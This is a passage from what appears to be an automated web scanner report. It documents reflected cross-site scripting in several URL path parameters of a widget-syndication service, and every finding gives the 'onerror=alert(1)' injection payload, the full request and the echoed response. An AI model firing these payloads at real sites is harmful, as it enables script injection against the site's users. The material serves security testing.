configurationParams : {"wbx_ns_image":"http:ca147<img src=a onerror=alert(1)>5a5384338c5//img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http://ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.p
...[SNIP]...

2.60. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6650a<img%20src%3da%20onerror%3dalert(1)>ecade577ac8 was submitted in the REST URL parameter 7. This input was echoed as 6650a<img src=a onerror=alert(1)>ecade577ac8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com6650a<img%20src%3da%20onerror%3dalert(1)>ecade577ac8/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:57 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
form.WidgetConfigPathHandler = {
initializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com6650a<img src=a onerror=alert(1)>ecade577ac8/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http://ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfi
...[SNIP]...

2.61. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 8bc7b<img%20src%3da%20onerror%3dalert(1)>4e400dae6d3 was submitted in the REST URL parameter 8. This input was echoed as 8bc7b<img src=a onerror=alert(1)>4e400dae6d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded8bc7b<img%20src%3da%20onerror%3dalert(1)>4e400dae6d3/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
etConfigPathHandler = {
initializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded8bc7b<img src=a onerror=alert(1)>4e400dae6d3/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http://ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHand
...[SNIP]...

2.62. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 84524<img%20src%3da%20onerror%3dalert(1)>d41c2a32747 was submitted in the REST URL parameter 9. This input was echoed as 84524<img src=a onerror=alert(1)>d41c2a32747 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b9684524<img%20src%3da%20onerror%3dalert(1)>d41c2a32747/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:02 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
alizationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b9684524<img src=a onerror=alert(1)>d41c2a32747/ibmbackupm.png","wbx_ns_link":"http://ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];

...[SNIP]...

2.63. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 10]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 10 is copied into the HTML document as plain text between tags. The payload 3cf92<img%20src%3da%20onerror%3dalert(1)>c32d66ccddf was submitted in the REST URL parameter 10. This input was echoed as 3cf92<img src=a onerror=alert(1)>c32d66ccddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:3cf92<img%20src%3da%20onerror%3dalert(1)>c32d66ccddf/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:02 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17779


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:3cf92<img src=a onerror=alert(1)>c32d66ccddf/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platfo
...[SNIP]...

2.64. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 11]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 11 is copied into the HTML document as plain text between tags. The payload db50d<img%20src%3da%20onerror%3dalert(1)>7a79867db58 was submitted in the REST URL parameter 11. This input was echoed as db50d<img src=a onerror=alert(1)>7a79867db58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.netdb50d<img%20src%3da%20onerror%3dalert(1)>7a79867db58/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:06 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Content-Length: 17779
Connection: close


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:/ad.doubleclick.netdb50d<img src=a onerror=alert(1)>7a79867db58/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){
...[SNIP]...

2.65. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 12]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 12 is copied into the HTML document as plain text between tags. The payload 7fa15<img%20src%3da%20onerror%3dalert(1)>ad69b791dbc was submitted in the REST URL parameter 12. This input was echoed as 7fa15<img src=a onerror=alert(1)>ad69b791dbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk7fa15<img%20src%3da%20onerror%3dalert(1)>ad69b791dbc HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:09 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17787


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:/ad.doubleclick.net/clk7fa15<img src=a onerror=alert(1)>ad69b791dbc"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){

...[SNIP]...

2.66. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d8e22<img%20src%3da%20onerror%3dalert(1)>438d8369141 was submitted in the REST URL parameter 4. This input was echoed as d8e22<img src=a onerror=alert(1)>438d8369141 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/idd8e22<img%20src%3da%20onerror%3dalert(1)>438d8369141/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:45 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17779


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
adyCallback, true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"platform":"InsertWidget","idd8e22<img src=a onerror=alert(1)>438d8369141":"53234a87-ed5a-47ec-859e-f6aaec12e3ce"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:/ad.doublecl
...[SNIP]...

2.67. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8653d<img%20src%3da%20onerror%3dalert(1)>f2b799089e1 was submitted in the REST URL parameter 5. This input was echoed as 8653d<img src=a onerror=alert(1)>f2b799089e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce8653d<img%20src%3da%20onerror%3dalert(1)>f2b799089e1/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:48 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17787


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce8653d<img src=a onerror=alert(1)>f2b799089e1","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"}
...[SNIP]...

2.68. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e1858<img%20src%3da%20onerror%3dalert(1)>142cee02189 was submitted in the REST URL parameter 6. This input was echoed as e1858<img src=a onerror=alert(1)>142cee02189 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:e1858<img%20src%3da%20onerror%3dalert(1)>142cee02189/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:51 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17779


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:e1858<img src=a onerror=alert(1)>142cee02189/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.pla
...[SNIP]...

2.69. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 51606<img%20src%3da%20onerror%3dalert(1)>5910305e668 was submitted in the REST URL parameter 7. This input was echoed as 51606<img src=a onerror=alert(1)>5910305e668 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com51606<img%20src%3da%20onerror%3dalert(1)>5910305e668/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:54 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Content-Length: 17779
Connection: close


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
tform.WidgetConfigPathHandler = {
initializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com51606<img src=a onerror=alert(1)>5910305e668/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfig
...[SNIP]...

2.70. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 7207f<img%20src%3da%20onerror%3dalert(1)>2037fd07834 was submitted in the REST URL parameter 8. This input was echoed as 7207f<img src=a onerror=alert(1)>2037fd07834 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded7207f<img%20src%3da%20onerror%3dalert(1)>2037fd07834/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:57 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17787


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
getConfigPathHandler = {
initializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http:/img.widgetbox.com/uploaded7207f<img src=a onerror=alert(1)>2037fd07834/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:/ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandl
...[SNIP]...

2.71. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f2f8d<img%20src%3da%20onerror%3dalert(1)>aae1b279c95 was submitted in the REST URL parameter 9. This input was echoed as f2f8d<img src=a onerror=alert(1)>aae1b279c95 in the application's response.

